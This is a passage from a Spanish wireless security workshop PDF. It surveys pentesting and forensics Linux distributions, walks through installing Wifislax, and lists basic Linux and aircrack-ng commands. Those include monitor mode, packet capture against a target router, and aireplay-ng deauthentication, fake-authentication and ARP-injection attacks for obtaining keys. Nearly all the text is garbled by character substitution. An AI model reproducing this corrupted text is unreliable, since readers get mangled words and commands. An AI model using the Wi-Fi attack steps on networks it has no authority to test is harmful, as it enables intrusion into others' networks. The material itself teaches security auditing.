'itio web 7ttp??www.pentoo.c7 .EA6ERT1;N$ea/ert74n es una distribución bien cuidada + una comunidad devota.Construido a partir de !ebian '5uee3e 8lu#bo# dentro de un entorno deescritorio9) este sistema operativo es particularmente adecuada para $iipirater2a) +a 5ue contiene un montón de grietas inalámbrica + 7erramientasde 7ac/ing.erramientas 5ue inclu+e ata5ues $ii) 'Q" ac/ing) Cisco E#plotación)%assword Crac/ing) $eb ac/ing) (luetoot7) BoI% ac/ing) Ingenier2a

'ocial) recopilación de inormación) u33ing ndroid ac/ing) Redes +undas para 5ue crean.Especiicaciones 1ipo de '> "inu#. (asado en !ebian) &buntu >rigenItalia r5uitectura iD;) #;T4Escritorio KCE

'i miramos en su página web te da la sensación de 5ue los mantenedoresson activos + 5ue escribe un montón de gu2as + tutoriales para a+udar a losnovatos. Como se basa en !ebian '5uee3e) esto podr2a ser algo 5ue se5uiere dar una oportunidad.

26

Page 27: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 27/260

'itio web 7ttp??wea/netlabs.com?main? 

Matriu'>tra gran distribución enocada para pentesters. En esta distribución)podemos encontrar algunas 7erramientas conocidas como

ast-1rac/ 8 nos orece un ramewor/ 5ue nos acilita la tarea a la 7ora de5uerer auditar la seguridad de nuestros e5uipos) nos permite la identiicación+ e#plotación de vulnerabilidades encontradas en los servicios 5ue corren ennuestras ma5uinas) servidores o páginas webU 9.

 ngr+ Ip 8 una gran 7erramienta 5ue nos permite la identiicación de 7ostactivos en nuestra red o de un rango de direcciones I% en especiico) comotambi6n nos permite identiicar los puertos 5ue están activos en dic7os7osts 9.

$ires7ar/ 8 la ma+or2a +a conocemos esta gran 7erramienta 5ue nospermite ver el tráico 5ue pasa por nuestra red local) con la a+uda de unosbuenos iltros podr2amos ver 5ue tan segura es nuestra red + ver si muestrainormación sensible para usuarios mal-intencionados en nuestra red 9.

(rute'' 8 con esta 7erramienta podremos saber 5ue tan segura es lacontrasea 5ue 7emos deinido para nuestros ss7 de nuestras ma5uinas)

27

Page 28: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 28/260

recordemos 5ue este tipo de 7erramientas de uer3a bruta uncionan conlistas de contraseas por deecto recolectadas desde internet 9.

'itio web 7ttp??www.matriu#.com 

DE/T!E1 "inu# es una distribución *N& ? "inu# "ive sotware libre basada en&buntu ) diseada por 'teano ratepietro para ines relacionados con lainormática orense + la seguridad inormática.!E1 "inu# se compone de un sistema *N& ? "inu# + !R1 8 1ool/itRespuesta !igital van3ada 9 ) la suite dedicada a la ciencia orense digital +actividades de inteligencia. ctualmente es desarrollado + mantenido por 

'teano ratepietro ) con el apo+o de ,assimo !al Cero) 'andro Rossetti)%aolo !al C7ecco ) !avide *abrini ) (artolomeo (ogliolo ) Balerio "eomporra+ ,arco *iorgi ."a primera versión de "inu# !E1 se introdujo en <00A ) gracias al Curso deComputación orense de la acultad de !erec7o de la &niversidad de(olonia. Esta distribución se utili3a actualmente en el laboratorio orensecelebrado en la &niversidad de (olonia + en otras muc7as universidadesitalianas + las entidades privadas .1ambi6n es una de las principales soluciones empleadas por las uer3as delorden durante las investigaciones orenses inormáticos .

28

Page 29: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 29/260

 demás de un n:mero considerable de aplicaciones linu# + scripts ) 7ábil

tambi6n cuenta con la suite de !R1 5ue contiene aplicaciones de $indows8tanto de código abierto + de código cerrado 9 5ue siguen siendo viablescomo no 7a+ un e5uivalente en el mundo &ni#.'itio web 7ttp??www.detlinu#.net  

CAINECaine es otra distro basada &buntu de origen italiano.Caine 8 un acrónimo de Computer ided Investigative EnviromentV 9 es unadistribución live orientada a la inormática orense 8orense9 7istóricamenteconcebido por *iancarlo *iustini ) dentro de un pro+ecto de análisis orensedel Centro de Investigación Interdepartamental digital para la 'eguridad8CRI'9 de la &niversidad de ,ódena + Reggio Emilia ver sitio >icial.

 ctualmente el pro+ecto se mantiene gracias a Nanni (assetti ."a :ltima versión de Caine se basa en &buntu "inu# =<.04 "1' ) +erba mate+ "ig7t!, . En comparación con su versión original ) la versión actual se 7amodiicado para cumplir con los estándares de iabilidad + las normasseguridad orense establecidas por el NI'1.

29

Page 30: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 30/260

Caine inclu+e Interace Caine - con una intera3 ácil de usar 5ue re:ne una serie de7erramientas orenses de renombre ) muc7os de los cuales son de códigoabierto L

 ctuali3ado + con un entorno para llevar a cabo un análisis orenseoptimi3ado L*enerador de reportes semi-automático) por lo 5ue el investigador tiene undocumento ácilmente editable + e#portable con un resumen de lasactividadesL"a ad7esión al procedimiento de investigación deinido recientemente por lale+ italiana 4;?<00; ) la "e+ 4; ?<00;) .

Caine es la primera distribución 5ue inclu+e 7erramientas orenses dentro delos 'cripts Caja ? Nautilus + todos los parc7es de seguridad para no alterar 

los dispositivos de análisis."a distro utili3a varios parc7es abricados espec2icamente para 7acer 5ue elsistema @orense@ ) es decir) no alterare el dispositivo original para ser probado + ? o duplicados   'pooing sistema de arc7ivos ra23 parc7e 5ue evita la manipulación deldispositivo de origen L  %arc7e de no recuperación automática de Oournal daado parc7e 5ueevita la manipulación de la uente del dispositivo ) a trav6s de la recuperaciónde Oournal L  ,ounter + R(stab dispositivos de montaje de orma sencilla +a trav6sde la intera3 gráica . R(stab se establece en el tratamiento de EK1D comonoload EK14 con la opción de evitar la recuperación automática de cual5uier arc7ivo Oournal corrupto de EK1D L  rc7ivo de intercambio 8swap9 o parc7e 5ue evita modiicar el arc7ivo deintercambio en sistemas con memoria R, limitada ) evitando la alteracióndel e5uipo original + la sobrescritura de datos :tiles para los ines deinvestigación.CINE representa plenamente el esp2ritu de la iloso2a >pen 'ource) +a 5ueel pro+ecto está completamente abierto) cual5uiera pod2a tomar el legado del

desarrollador anterior o jee de pro+ecto .

30

Page 31: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 31/260

'itio web 7ttp??www.caine-live.net 

4arrot Securit 9SEs un avan3ado sistema operativo desarrollado por ro3enbo# Networ/ +diseado para reali3ar pruebas de seguridad + de penetración) 7acer unanálisis orense o actuar en el anonimato.Cual5uier persona puede utili3ar %arrot) de la %ro pentester al novato) +a 5ueproporciona las 7erramientas más proesionales combinados en un ácil deusar) rápido + entorno pen-testing ligero + se puede utili3ar tambi6n para unuso diario.

%arece 5ue esta distro se dirige a los usuarios italianos espec2icamentecomo pocas otras mencionado. 'u intera3 es más limpia 5ue sugiere 5uetienen un e5uipo de desarrollo activo trabajando en ello) 5ue no se puededecir por encima de algunos otros distroes. 'i usted va a trav6s de su páginade capturas de pantalla 5ue usted verá 5ue es mu+ aseado. !arle unaoportunidad +a 5ue inorme) nunca se sabe 5u6 distro 5ue se adapte mejor.

31

Page 32: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 32/260

'itio web 7ttp??www.parrotsec.org?inde#.p7p?,ainT%age 

Blac7Arch Linu'(lac/rc7 "inu# es una e#pansión de peso ligero para rc7 "inu# parapruebas de penetración + los investigadores de seguridad . El depósitocontiene ;D; 7erramientas . %uede instalar las 7erramientas de ormaindividual o en grupos. (lac/rc7 es compatible con rco e#istente instala .1enga en cuenta 5ue aun5ue (lac/rc7 es superar la ase beta ) todav2a esun pro+ecto relativamente nuevo .

e usado rc7 "inu# por un tiempo ) es mu+ ligero + eiciente . 'i se sientecómodo con la construcción de su instalación de "inu# desde cero + almismo tiempo 5ueremos 5ue todos los erramientas %entest 8 sin tener 5ueaadir manualmente una a la ve3 9) entonces (lac/rc7 es la distroadecuada para usted. Comunidad Conociendo rc7 ) las cuestionesrelacionadas con su apo+o se resolverá rápidamente.'in embargo ) debo advertir 5ue rc7 "inu# 8o (lac/rc7 "inu# en este caso9no es para principiantes ) te perderás en el paso D o 4 durante la instalación .'i usted es moderadamente cómodo con "inu# + rco en general) ir a por 

32

Page 33: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 33/260

ello . 'u sitio web + la comunidad se ve mu+ organi3ado 8,e gusta eso9 +sigue creciendo

'itio web 7ttp??www.blac/arc7.org 

Net#or7 Securit Tool7it -NST0(asada en edora es un "ive C! e5uipado con 7erramientas de análisis deseguridad de redes) programas de validación + monitoreo 5ue puede ser utili3ado en servidores virtuales 5ue albergan má5uinas virtuales. 'uprincipal objetivo es proveer a los administradores de red de un set completode 7erramientas de seguridad de código abierto. N'1 está e5uipado con unaavan3ada intera3 de usuario web 8$&I9 la cual nos permite conigurar lasaplicaciones de seguridad + redes) automati3ación) + otras tareas. Entreotras caracter2sticas se encuentran un capturador de pa5uetes + un sistema

de análisis de protocolos 5ue puede monitorear más de cuatro interaces dered usando $ires7ar/.

33

Page 34: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 34/260

Page 35: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 35/260

'itio web 7ttp??www.networ/securit+tool/it.org 

6atanaatana es una 'uite de seguridad ,ultiarran5ue "ive&'( 5ue inclu+e variasdistribuciones "inu# de seguridad + 7ac/ing 6tico 8como (ac/trac/)>p7crac/) + &(C!9 junto con las aplicaciones portables G%ortableappsH de$indows como ,etasploit) N,%) Cain W ble) $ires7ar/ + muc7os mas9para uncionar en modo live en una unidad de memoria &'(.

35

Page 36: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 36/260

'itio web atana v<.07ttp??sourceorge.net?projects?/atana-usb?'itio web atana vD.0 beta7ttp??sourceorge.net?projects?galsotportable?iles? 

<=u> e! .I/ISLA8?

Es una distribución *nu?"inu# basada en 'lac/ware + pensada para serusada tanto en "iveC!) como "ive&'( + como no cada ve3 más) parainstalación en el disco duro 8!!9.Está especiali3ada en la auditoria de redes inalámbricas 8$ireless9 ademásde poseer 7erramientas de gestión + uso cotidiano como) Reparadores de

arran5ue) procesadores de te#to) etc.En esta primera parte vamos a 7acer un recorrido por las 7erramientas$irelees + alguna de sistema) necesarias para seg:n 5u6 cosas.Empecemos"o primero es montar el arc7ivo de imagen I'> 8lo 5ue descargamos de losservidores de 'eguridad$ireless9 en un "iveC! ) "ive&'() o bien instalarloal !! 8 7a+ más opciones Instalación en usb) "Ive!) ,á5uina Birtual etcen el oro encontrareis toda la inormación necesaria para montar en estosmodos9

36

Page 37: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 37/260

4RIMER 4AS9!escarga de los arc7ivos + comprobación del ,!AConigurar la (ios de nuestro e5uipo) para 5ue en el orden de arran5ue est6nprimero los dispositivos &'( + el "ector de C!?!B!.

%ara esto revisa el manual de tu placa) es mu+ sencillo.Creaci"n de Li@eCD1odo lo 5ue sea una Bersión "ive) bien sea en &'( o en C!) al iniciarse sevolcara todo el sistema a la R, con lo cual no podr6is ocasionar daos avuestro sistema operativo 7abitual) pero tampoco conservareis ning:ncambio +a 5ue al reiniciar el e5uipo todo volverá a estar como al principio.a+ una orma de conservar los cambios en un "ive&'( 5ue se llamaGcambios persistentesH GpersistenceH) pero para usarla 7a+ 5ue selecionar esta opción al crear el "ive&'(.

 visar 5ue si tenemos instalado $inRR en nuestro sistema $indows) escom:n 5ue los arc7ivos de imagen I'> nos lo muestre con el icono dewinRR) sin ser un arc7ivo .rar con lo 5ue puede llevar a e5uivoco al usuario.%ara Crear el "iveC! es tan sencillo como abrir vuestro sotware degrabación de cdXs + elegir gravar imagen de C!. En el ejemplo +o utili3areNER>) pero pod6is utili3ar otro programa de grabación de sotware librecomo Kburn para "inu# 5ue se puede descargar de7ttp??www.#ce.org?projects?#burn + esta incluida en la distribución *alsot"inu# + en otras distribuciones con escritorio #ce.

37

Page 38: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 38/260

&na ve3 5ue abramos NER>) cerramos la ventana de Gcompilación nuevaH)5ue sale al inicio. &na ve3 7ec7o esto) vamos al men: G*R(!>RH +elegimos G*rabar imagen G) se nos abrirá otra ventana para buscar el arc7ivode $II'"K en nuestro ! 8el 5ue 7emos descargado previamente9 + solo

abra 5ue seguir los paso de la grabación de un C! normal.>s recomiendo 5ue lo 7agáis a una velocidad de grabación baja.

Creaci"n de Li@eUSBComo siempre descargamos El arc7ivo de imagen I'> de los servidores de'eguridad$ireless + comprobamos el ,!A de la descarga.ormateamos la memoria &'( con ormato 1D< 8este paso es mu+importante9.

 l contrario 5ue para la versión "iveC!) en esta ocasión descomprimiremosel arc7ivo de imagen I'> Con un descompresor como M3ip o $inRar o el

5ue us6is 7abitualmente 8+o recomiendo estos dos + en ese orden9 al usb +nos creara dos carpetas GbootH + Gwiisla#H.Este proceso será más o menos lento seg:n la velocidad del dispositivo + elpuerto &'() as2 como de la má5uina 5ue tengamos. %ero oscilara entre =0 +D0 min.&na ve3 5ue tengamos las dos carpetas en la ra23 de la memoria &'()iremos al directorio G(>>1H + ejecutaremos el arc7ivo Gbootinst.batH 8arc7ivopor lotes de $indows9.

38

Page 39: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 39/260

Este proceso lo 5ue 7ará) será convertir al $II'"K 5ue tenemos en lamemoria &'( en auto-arrancable desde la (ios 8bootable9) para 5ue con elordenador apagado + la memoria &'( insertada en el puerto &'() alencender el ordenador) en ve3 de arrancar nuestro sistema operativo7abitual) lo 7ará $II'"K 8%ara ello tendremos 5ue tener nuestra (iosconigurada previamente para 5ue permita arrancar desde ese medio antes5ue desde el !!9

Creaci"n del Li@eUSB con Uni@er!alUSBIn!taller o UMI"as aplicaciones &niversal-&'(-Installer + Y&,I son gratuitas + nos acilitanla tarea de crear !istribuciones "i ve&'( + 7a+ versiones disponibles para$indows + "inu#. %odemos descargarlas de www.pendrivelinu#.com 

Uni@er!alUSBIn!taller &saremos esta aplicación si solo necesitamos tener una distrbución en el 7d.

 brimos la aplicación. 'elecionamos la distribución 5ue deseamos instalar)

elegimos el usb + la ubicación del arc7ivo iso. %odemos selecionar si5ueremos ormatear o no la memoria usb antes de instalar la distribución enel usb. l darle a siguiente el programa 7ara todo el proceso !escomprimela iso) la copia al usb + 7ace el usb autoarrancable.

39

Page 40: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 40/260

%ara arrancar desde el usb tenemos 5ue asegurarnos de seleccionarlo unave3 arran5ue el ordenador pulsando =< o poniendo el usb como primer dispositivo de arran5ue en la (I>'.

 UMIEl uncionamiento de esta aplicación es igual a &niversal-&'(-Installer perola ventaja es 5ue permite instalar varias distribuciones live en una mismamemoria usb.

40

Page 41: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 41/260

Cuando iniciemos el sistema con el usb autoarrancable nos saldrá un men:en el 5ue podemos elegir con 5ue distribución live de las 5ue instalamosiniciar.

INSTALACI9N DE .I/ISLA8 EN 1D -DISC9 DUR90Esta opción es un poco más compleja 5ue las anteriores) pero si usas$II'"K a menudo) es la mejor opción 5ue podrás elegir. Ira muc7o másrápido + podrás guardar todas tus coniguraciones) contraseas) documentos+ procesos sin acabar.&na ve3 5ue 7emos descargado la imagen I'> + comprobado el ,!Aempe3aremos con el proceso.%ara instalar una distribución *nu?"inu# en nuestro disco duro necesitaremos7acerlo obligatoriamente en una partición propia 8distinta a la 5ue tengamos

para $indows9) además es mu+ aconsejable en má5uinas modernas +obligatorio en ma5uina antiguas) otra partición tipo '$% 5ue actuara enorma de memoria R, e#tendida.Necesitamos crear una partición de como m2nimo A*b 8 es recomendableentre =0 + =A*b o más para poder tener espacio para instalar nuevosprogramas9 ormateada con ormato EK14 en la 5ue ira instalado $II'"K+ otra del tipo '$% 5ue será de un tamao seg:n la siguiente relación

41

Page 42: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 42/260

Memoria RAM Tamao S.A4A=<,b <)A*b

=*b <*b<*b =*b4*b =*b

uente Elaboración propia

Como podemos ver en el gráico la suma de la ,emoria Ram + 'wap tiene5ue ser de D*b o más para 5ue las aplicaciones almacenadas memoria nose 5ueden sin espacio + Gse cuelgue el sistemaH. "as aplicaciones seejecutan primero en la Ram + cuando esta 5ueda sin espacio usan lamemoria 'wap. Con 4*b en principio no es necesario la swap pero por seguridad es crearemos igual la partición 8pondremos =*b en este caso9

Como crear la! particione! con G4arted%ara crear las particiones podremos 7acerlo desde el propio $II'"K8ejecutado en modo "IBE9 con la 7erramienta *%arted) 5ue se encuentra en,en: Z sistema Z *%arted%ongamos un ejemploEsta es la estructura de mi disco antes de agregar las particiones

42

Page 43: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 43/260

'da=-< + D son las particiones $indows) ndroid 8es un netbooc/9 +recuperación luego esta una e#tendida de <=A *b 8sdaA9 de la 5ue vo+ ae#traer las dos particiones 5ue me 7acen alta) redimensionando esta :ltima.%ara ello lo primero 7acemos clic/ derec7o Z desmontar.

&na ve3 desmontada 7acemos clic/ derec7o) otra ve3 + seleccionamosGredimensionar moverH. 'eleccionamos el tamao 5ue 5ueremos) en estecaso 7e puesto 000,( 8donde poneH espacio libre a continuaciónH9 +

aceptamos.

43

Page 44: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 44/260

%ara 5ue los cambios surtan eecto) 7abrá 5ue darle al signo de validación5ue está arriba en la barra de botones 8en color verde9

'e pondrá a ejecutar 

44

Page 45: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 45/260

%roceso terminado con 6#ito

 7ora montamos de nuevo) la partición 5ue 7ab2amos redimensionado8'daA9 + con el espacio 5ue nos 7a 5uedado sin asignar) creamos la nuevapartición 5ue tendrá ormato EK14.Clip derec7o sobre el espacio no asignado + elegimos GnuevaH) se abrirá una

nueva ventana en la 5ue tendremos los datos 5ue tendrá esta nuevapartición"o :nico a cambiar será el apartado Gsistema de arc7ivosH 5ue elegiremosEK14) en caso de 5ue no lo est6 por deecto. acemos clip en aadir +validamos en el botón verde de la barra de botones.

45

Page 46: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 46/260

Ya tenemos nuestra partición para instalar $II'"K a7ora solo tendremos5ue crear otra tipo '$% de la misma orma!esmontamos 'daARedimensionamos + ponemos el tamao deseado seg:n la tabla de arriba enmi caso =000,b.Bolvemos a montar 'daA + 7aciendo clip derec7o sobre el nuevo espacio5ue tenemos sin asignar seleccionaremos GadirH .En este caso en Gsistema de arc7ivosH Elegiremos G"inu#-swapH aceptamos +validamos en el botos de color verde de la barra de botones

Ya estamos preparados para instalar nuestra distro avorita en el disco duro. Este es el resultado

46

Page 47: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 47/260

Recordar el nombre de la partición en la 5ue ira $II'"K) en nuestro caso'da 8nos 7ará alta luego9%ara el proceso de instalación de $II'"K + del grub) os pondr6 un video5ue se ve mejor 

AADIEND9 M9DUL9S A .I/ISLA8Como sab6is) $II'"K está basado en un sistema modular) el cual nospermite aadir cuantos módulos necesitemos para ampliar nuestro sistema +

llegar a convertirlo en nuestro '> de escritorio cotidiano.En el oro de www.seguridadwireless.net se publican los módulos creadospor los desarrolladores + 5ue suelen abarcan la ma+or2a de las necesidades.En sitio web www.wiisla#.com en el apartado móduloswww.wiisla#.com?categor+?modulos-e#tra encontraremos todos los modulos disponibles para $iisla# en ormato #3m.'i 5ueremos usar alguna aplicación concreta 5ue no este en el apartadomódulos podemos aprender a como crear modulos con este Bideotutorial7ttps??www.+outube.com?watc7Sv[ao,"MDI0 Bamos a poner a continuación los pasos a seguir para la creación de un

modulo #3m en wiisla#

47

Page 48: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 48/260

Page 49: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 49/260

 7ora en la pantalla de abajo) buscamos nuestro $II'"K + 7acemosdoble clic/ para abrir el arc7ivo. Beremos el contenido de la imagen + seráeditable en la pantalla de arriba

49

Page 50: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 50/260

 7ora solo tendremos 5ue buscar los módulos 5ue 7emos descargadopreviamente 8+o pondr6 < ) el Odownloader + teamviewer9 + moverlos a lacarpeta?wiisla#?modules

50

Page 51: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 51/260

Ya solo 5ueda crear la nueva imagen modiicada de $II'"K. %ara esodamos a guardar como) os aconsejo 5ue elijáis uno distinto a la original por sise produce un error no tener 5ue descargarla de nuevo.Ya está +a tenemos nuestro $II'"K modiicado + personali3ado

M9NTAR M9DUL9S EN LI&EUSB

Esta orma de aadir módulos) es muc7o más sencilla.&na ve3 5ue tenemos el "ive&'( creado 8como se indica arriba9) bastarácon copiar + pegar los módulos 5ue nos 7emos descargado a la ruta?wiisla#?modules . +a está as2 de ácil.1anto en el modo "iveC!) como en "ive&'( tambi6n se pueden copiar losmódulos a la ruta  #i$i!la'3a!epero +o recomiendo siempre poner losaadidos en Fmodule!+a 5ue en FBa!e están los módulos 5ue viene deserie en la "IBE + as2 siempre sabremos 5ue 7emos metido nosotros 8por si7a+ un error de arran5ue por ejemplo9

51

Page 52: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 52/260

INSTALAR M9DUL9S EN .I/ISLA8 INSTALAD9 EN 1DD$II'"K a dispone de una *&I) 5ue ejecuta el srcitp G#3m<dirH con lo 5uela instalación de módulos con wiisla# instalado en !!) se 7ace mu+cómoda + sencilla.

%ara ejecutar el instalador vamos a,enu--sistema --Instalador de módulos !!Bamos a la ruta donde los tengamos guardados + ejecutamos.,u+ importante) recordar 5ue los módulos 7an de estar guardados en lapartición donde tengamos $II'"K) si los 7ab6is descargados desde$indows) podr6is moverlos) sin problemas con el gestor de arc7ivos de$II'"K

C9MAND9S LINU8 BASIC9SBamos a 7acer un pe5ueo resumen de los comandos 8para el terminal9 másutili3ados en wiisla#. Cada comando tiene varias variables) pero como estopretende ser un manual básico) solo pondr6 las más usas) o en este caso las5ue más uso +o.ComandoiwconigNos mostrara) por pantalla) inormación de las interace de red 5ue tengamosen nuestro pc) tanto Et7ernet como $ireless. demás podemos aadir alcomando) el nombre de una interace + una opción para obtener más datos +variables.Ej iwconig wlanKNos dará inormación de la coniguración del dispositivo) nombrado como

wlan0

52

Page 53: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 53/260

1ambi6n le podemos aadir una opción + usarlo para poner la tarjeta enmodo monitor Comandoiwconig wlanK mode monitor 

> modo manager Comandoiwconig wlanK mode manager %ara encender la radio de nuestro dispositivo wiiComandoiwconig wlanK power on

Comandoiwconig wlanK 1K power KK!onde KK será un valor num6rico para poder subir la potencia de salida de

nuestro dispositivo wii 8siempre 5ue sea compatible9 1endremos 5ue 7aber cargado previamente los módulos CR! 8se encuentran en la carpetaoptional9%ara apagar la radio de nuestro dispositivo wiiComandoiwconig wlanK power o 

ComandoiconigNos da inormación tcp?ip de la red tanto Et7ernet como wireless1iene dos variables mu+ usadas e importantes 5ue sonComandoiconig wlaK upCon este comando GlevantaremosH nuestro dispositivo para 5ue seareconocido por el sistemaComandoiconig wlanK downCon este comando tumbaremos nuestro dispositivo) para 5ue el sistema dejede reconocerlo

!igamos 5ue estos comandos se usan para Freiniciar los dispositivosinalámbricos cuando vamos a darles un uso distinto o en 7erramientasdistintas dentro de $II'"K.Normalmente las *&IX' + 'cript incluidos en $II'"K +a llevan estecomando implementados en su código) con lo 5ue no os preocup6is 5uecuando cerr6is o abráis una 7erramienta nueva para cambiar la manera deauditar) está +a se encargara de 7acer esto."os usareis) por ejemplo cuando not6is 5ue el rendimiento del dispositivo noes óptimo o simplemente 5ue no unciona.Comando

53

Page 54: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 54/260

lspciEste comando no listara todos los dispositivos %CI reconocidos por elsistemaComando

lsusbEste nos listara todos los dispositivos &'( reconocidos por el sistemaComandod7cpcdCon este comando podremos activar el cliente !C% + as2 poder conectarnos a una red) recibiendo) dirección I%) rutas etc.ComandolsmodNos listara los módulos 5ue tenemos instalados en el sistema

Comando! de Aircrac7ng

Aircrac7 e! la 3i3lia de la auditoria de !eguridad #irele!!+En esta suite se basan casi todas 8por no decir todas9 las 7erramientas deauditor2as 5ue se utili3an 7o+ en d2a) para los ata5ues a los protocolos deseguridad + encriptación de los routers e#istentes) v6anse *uiXs) 'cript etc. Ycomo tal es de obligado conocimiento para cual5uiera 5ue se 5uiera adentrar en este mundo) una ve3 5ue cono3camos este conjunto de 7erramientasentenderemos mejor el uncionamiento de esos script) en los 5ue nosdedicamos a pulsar n:meros + obtenemos una clave.Esta suite consta de muc7as 7erramientas.En esta gu2a solo veremos los comandos de las más comunes

 irmon-ng irodump-ng irpla+-ng ircrac/-ngEn todos los casos debemos abrir el terminal e introducir los comandosindicados

AIRM9NNGComandoairmon-ngEste comando) usado tal cual nos mostrara inormación sobre el c7ip denuestro dispositivo wireless) si le aadimos la variable start?stop nospondrá nuestro dispositivo en modo monitor o modo manager seg:n la 5ueusemos.%oner modo monitor Comandoairmon-ng start wlanK

54

Page 55: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 55/260

%arar modo monitor Comandoairmon-ng stop monK

AIR9DUM4NGComandoairodump-ng ]opción^ _dispositivo`'e usa para capturar los datos transmitidos a trav6s de las ondas wii)concretamente las bali3as mandadas por los routers cercanos 8(eacons9 +los IBs 8vectores iniciales9 de los pa5uetes wep.Comandoairodump-ng monKEsta cadena nos mostrara todas las redes wii al alcance) con su (ssid)essid) power)c7anel) tipo de encriptación. Etc

"o normal a la 7ora de lan3ar esta 7erramienta) es especiicar el canal + lared 7acia la 5ue vamos a dirigir la captura de pa5uetes) para elloespeciicaremos el canal) el nombre de la red + el nombre del arc7ivo con el5ue vamos a guardar la captura) para despu6s utili3ar aircrac/-ng para sacar la clave. &tili3aremos esta cadena.Comandoairodump-ng Zc _canal` Zw _nombre del arc7ivo` Zb ==<<DD44AA monK

AIRE4LANGEsta 7erramienta es la 5ue se usa para lan3ar los distintos ata5ues) 5ue sonlos siguientesAtaHue )+ 'irve para des autentiicar a un cliente conectado al ap 5ueestamos atacando. Esto es especialmente :til cuando la red tiene cirado$%) +a 5ue se lograra 5ue el cliente se tenga 5ue volver a autentiicar +podremos capturar el ands7a/eAtaHue ,+  utentiicación alsa. Este ata5ue se utili3a cuando no 7a+ uncliente leg2timo conectado a la red. !e esta orma nosotros crearemos uncliente also 5ue se asociara al % + as2 podremos lan3ar los ata5uescorrespondientes.

Es indispensable para lan3ar los ata5ues <) D + 4AtaHue *. Rein+ección Interactiva de pa5uetes. Este ata5ue nos permiteelegir el pa5uete 5ue vamos a rein+ectar al %.AtaHue + In+ección de pa5uetes R% utomáticamente. Este ata5ue es elmás eectivo) cuando 7a+ un cliente legitimo conectado) una ve3 se lan3a elata5ue la aplicación intentara conseguir un pa5uete R% + cuando loconsiga) empe3ara a rein+ectárselo al % generando as2 un tráico 5ue nospermitirá subir los IBs a una velocidad ren6ticaAtaHue ;+ !igamos 5ue esto es un ata5ue por saturación al router v2ctima)7o+ por 7o+ es mu+ poco eectivo) +a 5ue los routers identiican el ata5ue +

55

Page 56: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

